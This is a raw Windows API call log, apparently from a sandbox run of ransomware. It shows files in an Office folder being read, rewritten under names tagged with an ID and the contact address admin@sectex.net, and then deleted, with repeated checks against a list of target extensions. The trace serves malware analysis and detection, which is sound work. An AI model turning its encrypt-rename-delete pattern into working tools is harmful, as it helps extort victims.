	[0160.714] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.715] GetLastError () returned 0x0
	[0160.715] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.736] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.737] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.737] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.737] SetEndOfFile (hFile=0x37c) returned 1
	[0160.737] CloseHandle (hObject=0x37c) returned 1
	[0160.737] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.737] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.739] CloseHandle (hObject=0x3c4) returned 1
	[0160.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.740] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico")) returned 1
	[0160.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.740] lstrlenW (lpString=".doc") returned 4
	[0160.740] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.740] lstrlenW (lpString=".docx") returned 5
	[0160.740] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.740] lstrlenW (lpString=".pdf") returned 4
	[0160.740] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.740] lstrlenW (lpString=".xls") returned 4
	[0160.740] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.740] lstrlenW (lpString=".xlsx") returned 5
	[0160.740] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.740] lstrlenW (lpString=".ppt") returned 4
	[0160.741] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString=".zip") returned 4
	[0160.741] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString=".rar") returned 4
	[0160.741] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString=".bz2") returned 4
	[0160.741] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.741] lstrlenW (lpString=".7z") returned 3
	[0160.741] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString=".dbf") returned 4
	[0160.741] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString=".1cd") returned 4
	[0160.741] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString=".jpg") returned 4
	[0160.741] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.741] lstrlenW (lpString=".doc") returned 4
	[0160.741] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.741] lstrlenW (lpString=".docx") returned 5
	[0160.741] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.741] lstrlenW (lpString=".pdf") returned 4
	[0160.741] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString=".xls") returned 4
	[0160.741] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.741] lstrlenW (lpString=".xlsx") returned 5
	[0160.742] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.742] lstrlenW (lpString=".ppt") returned 4
	[0160.742] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.742] lstrlenW (lpString=".zip") returned 4
	[0160.742] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.742] lstrlenW (lpString=".rar") returned 4
	[0160.742] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.742] lstrlenW (lpString=".bz2") returned 4
	[0160.742] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.742] lstrlenW (lpString=".7z") returned 3
	[0160.742] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.742] lstrlenW (lpString=".dbf") returned 4
	[0160.742] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.742] lstrlenW (lpString=".1cd") returned 4
	[0160.742] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO") returned 66
	[0160.742] lstrlenW (lpString=".jpg") returned 4
	[0160.742] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.742] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.742] lstrlenW (lpString="DOC.CFG") returned 7
	[0160.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.743] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=765) returned 1
	[0160.743] CloseHandle (hObject=0x3c4) returned 1
	[0160.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg")) returned 0x20
	[0160.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.743] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.744] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.744] GetLastError () returned 0x0
	[0160.744] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2fd, lpOverlapped=0x0) returned 1
	[0160.757] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x300, lpOverlapped=0x0) returned 1
	[0160.758] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.758] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0160.758] SetEndOfFile (hFile=0x37c) returned 1
	[0160.758] CloseHandle (hObject=0x37c) returned 1
	[0160.758] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.758] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.760] CloseHandle (hObject=0x3c4) returned 1
	[0160.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.760] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg")) returned 1
	[0160.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.761] lstrlenW (lpString=".doc") returned 4
	[0160.761] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.761] lstrlenW (lpString=".docx") returned 5
	[0160.761] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0160.761] lstrlenW (lpString=".pdf") returned 4
	[0160.761] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.761] lstrlenW (lpString=".xls") returned 4
	[0160.761] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.761] lstrlenW (lpString=".xlsx") returned 5
	[0160.761] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0160.761] lstrlenW (lpString=".ppt") returned 4
	[0160.761] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.761] lstrlenW (lpString=".zip") returned 4
	[0160.761] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.761] lstrlenW (lpString=".rar") returned 4
	[0160.762] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString=".bz2") returned 4
	[0160.762] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.762] lstrlenW (lpString=".7z") returned 3
	[0160.762] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString=".dbf") returned 4
	[0160.762] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString=".1cd") returned 4
	[0160.762] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString=".jpg") returned 4
	[0160.762] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString=".doc") returned 4
	[0160.762] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString=".docx") returned 5
	[0160.762] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0160.762] lstrlenW (lpString=".pdf") returned 4
	[0160.762] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString=".xls") returned 4
	[0160.762] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString=".xlsx") returned 5
	[0160.762] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0160.762] lstrlenW (lpString=".ppt") returned 4
	[0160.762] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.762] lstrlenW (lpString=".zip") returned 4
	[0160.762] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.763] lstrlenW (lpString=".rar") returned 4
	[0160.763] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.763] lstrlenW (lpString=".bz2") returned 4
	[0160.763] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.763] lstrlenW (lpString=".7z") returned 3
	[0160.763] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.763] lstrlenW (lpString=".dbf") returned 4
	[0160.763] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.763] lstrlenW (lpString=".1cd") returned 4
	[0160.763] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG") returned 61
	[0160.763] lstrlenW (lpString=".jpg") returned 4
	[0160.763] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.763] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.763] lstrlenW (lpString="DOCL.ICO") returned 8
	[0160.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.764] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1078) returned 1
	[0160.764] CloseHandle (hObject=0x3c4) returned 1
	[0160.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico")) returned 0x20
	[0160.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.764] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.764] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.766] GetLastError () returned 0x0
	[0160.766] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.775] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.776] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.776] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0160.776] SetEndOfFile (hFile=0x37c) returned 1
	[0160.777] CloseHandle (hObject=0x37c) returned 1
	[0160.777] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.777] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.779] CloseHandle (hObject=0x3c4) returned 1
	[0160.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.780] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico")) returned 1
	[0160.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.780] lstrlenW (lpString=".doc") returned 4
	[0160.780] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.780] lstrlenW (lpString=".docx") returned 5
	[0160.780] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.780] lstrlenW (lpString=".pdf") returned 4
	[0160.780] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.780] lstrlenW (lpString=".xls") returned 4
	[0160.780] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.780] lstrlenW (lpString=".xlsx") returned 5
	[0160.781] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.781] lstrlenW (lpString=".ppt") returned 4
	[0160.781] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.781] lstrlenW (lpString=".zip") returned 4
	[0160.781] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.781] lstrlenW (lpString=".rar") returned 4
	[0160.781] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.781] lstrlenW (lpString=".bz2") returned 4
	[0160.781] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.781] lstrlenW (lpString=".7z") returned 3
	[0160.781] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.781] lstrlenW (lpString=".dbf") returned 4
	[0160.781] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.781] lstrlenW (lpString=".1cd") returned 4
	[0160.781] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.781] lstrlenW (lpString=".jpg") returned 4
	[0160.781] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString=".doc") returned 4
	[0160.782] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.782] lstrlenW (lpString=".docx") returned 5
	[0160.782] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.782] lstrlenW (lpString=".pdf") returned 4
	[0160.782] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString=".xls") returned 4
	[0160.782] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString=".xlsx") returned 5
	[0160.782] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.782] lstrlenW (lpString=".ppt") returned 4
	[0160.782] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString=".zip") returned 4
	[0160.782] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString=".rar") returned 4
	[0160.782] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.782] lstrlenW (lpString=".bz2") returned 4
	[0160.782] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.782] lstrlenW (lpString=".7z") returned 3
	[0160.782] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString=".dbf") returned 4
	[0160.782] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString=".1cd") returned 4
	[0160.782] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO") returned 62
	[0160.782] lstrlenW (lpString=".jpg") returned 4
	[0160.782] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.783] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.783] lstrlenW (lpString="DOCS.ICO") returned 8
	[0160.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.783] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0160.783] CloseHandle (hObject=0x3c4) returned 1
	[0160.783] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico")) returned 0x20
	[0160.783] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.784] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.784] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
